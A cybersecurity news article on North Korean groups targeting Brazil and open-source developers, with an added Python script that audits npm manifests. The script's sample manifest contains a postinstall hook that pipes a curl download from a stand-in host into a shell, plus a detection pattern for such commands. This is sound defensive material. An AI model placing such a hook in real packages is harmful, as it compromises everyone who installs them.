North Korean threat actors have been responsible for around one-third of all phishing activities aimed at Brazil since 2020, with cyber espionage groups increasingly focusing on the country’s growing influence.
In a recent report, Google’s Mandiant and Threat Analysis Group (TAG) highlighted that “government-backed North Korean actors have been targeting various sectors in Brazil, including the government, aerospace, technology, and financial services.”
Specifically, cryptocurrency and financial technology companies have been a prime target for three North Korean groups operating in Brazil.
One of the primary threat actors is known as UNC4899 (also tracked as Jade Sleet, PUKCHONG, and TraderTraitor), which has used a malicious Python app to target cryptocurrency professionals.
The attack method involves initial contact through social media, sending benign PDFs with job descriptions, and eventually distributing a malware-laced Python app disguised as a cryptocurrency tool.
Mandiant and TAG researchers described how UNC4899’s campaign involved sending a trojanized Python app to extract cryptocurrency data when certain conditions were met, highlighting a sophisticated social engineering tactic.
This method isn’t new: UNC4899 previously targeted individuals in the blockchain, cryptocurrency, online gambling, and cybersecurity sectors through GitHub repositories housing malicious npm packages.
Another known North Korean group, PRONTO, attempted to target diplomats by using decoy documents related to denuclearization and news, aiming to lure victims into providing login credentials.
These activities come after Microsoft revealed insights about Moonstone Sleet, a new North Korean threat actor targeting software, education, and defense sectors with ransomware and espionage attacks.
Moonstone Sleet is known for distributing malware through fake npm packages, similar to UNC4899, albeit with distinctive code structures.
Checkmarx researchers noted changes in the delivery method of Moonstone Sleet’s malware, indicating an evolution in their strategy.
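The article does not describe how the malicious npm packages attributed to UNC4899 and Moonstone Sleet deliver their payloads, so the following is an added example rather than code from Google, Mandiant, Checkmarx, or any of the groups or projects named above. It shows the kind of manifest audit a defender can run before installing a package pulled from a GitHub repository: it flags lifecycle scripts that execute at install time, commands inside those scripts that fetch or evaluate code, and dependencies that resolve outside the package registry. The `package.json` it inspects is constructed for illustration, and the heuristics are general supply-chain hygiene checks, not indicators taken from any specific campaign.

```python
import json
import re

# Constructed sample manifest for illustration only. It is not from any real
# package and not from the campaigns described in the article.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "crypto-price-helper",
    "version": "1.0.3",
    "scripts": {
        "postinstall": "node -e \"require('child_process').exec('curl -s http://198.51.100.7/s | sh')\"",
        "test": "jest",
    },
    "dependencies": {
        "lodash": "^4.17.21",
        "helper-utils": "git+https://github.com/example-org/helper-utils.git",
    },
})

# npm runs these script names automatically during install; a reviewer should
# read each one before allowing the package into a build.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# Hypothetical heuristic: commands that download, decode, or evaluate code at
# install time deserve manual review. Tune this list for your own environment.
SUSPICIOUS_COMMAND = re.compile(
    r"\b(curl|wget|node\s+-e|powershell|base64|eval)\b|child_process", re.I
)

# Dependency specs that bypass the registry (git URLs, raw HTTP, local files)
# cannot be pinned to a registry-audited version.
NON_REGISTRY_SPEC = re.compile(r"^(git\+|https?://|github:|file:)")


def audit_package_json(text):
    """Return a list of (category, detail) findings for a package.json string.

    Categories:
      lifecycle-hook          - a script that npm runs automatically at install
      suspicious-command      - that script matches a downloader/eval pattern
      non-registry-dependency - a dependency resolved from git/HTTP/file
    An empty list means none of the heuristics fired, not that the package is safe.
    """
    pkg = json.loads(text)
    findings = []

    for hook, cmd in pkg.get("scripts", {}).items():
        if hook in LIFECYCLE_HOOKS:
            findings.append(("lifecycle-hook", f"'{hook}' runs at install time: {cmd}"))
            if SUSPICIOUS_COMMAND.search(cmd):
                findings.append(("suspicious-command",
                                 f"'{hook}' invokes a downloader or code-evaluation pattern"))

    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        for name, spec in pkg.get(section, {}).items():
            if NON_REGISTRY_SPEC.match(spec):
                findings.append(("non-registry-dependency",
                                 f"{section}: '{name}' resolves outside the registry ({spec})"))
    return findings


if __name__ == "__main__":
    for category, detail in audit_package_json(SAMPLE_PACKAGE_JSON):
        print(f"[{category}] {detail}")
```

Run against the constructed manifest, the audit reports the `postinstall` hook, the download-and-execute pattern inside it, and the git-sourced dependency. In practice this sits alongside, not instead of, installing with `--ignore-scripts` and reviewing the repository itself: the check only reads the manifest, so code hidden in the package's JavaScript files still needs a human or a scanner to look at it.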
While Moonstone Sleet’s tactic exploits the trust in open-source repositories, Kimsuky, another North Korean group, was found impersonating Reuters to target North Korean activists with information-stealing malware disguised as interview requests.
These discoveries highlight the need for heightened cybersecurity vigilance and awareness, especially in dealing with social engineering attacks.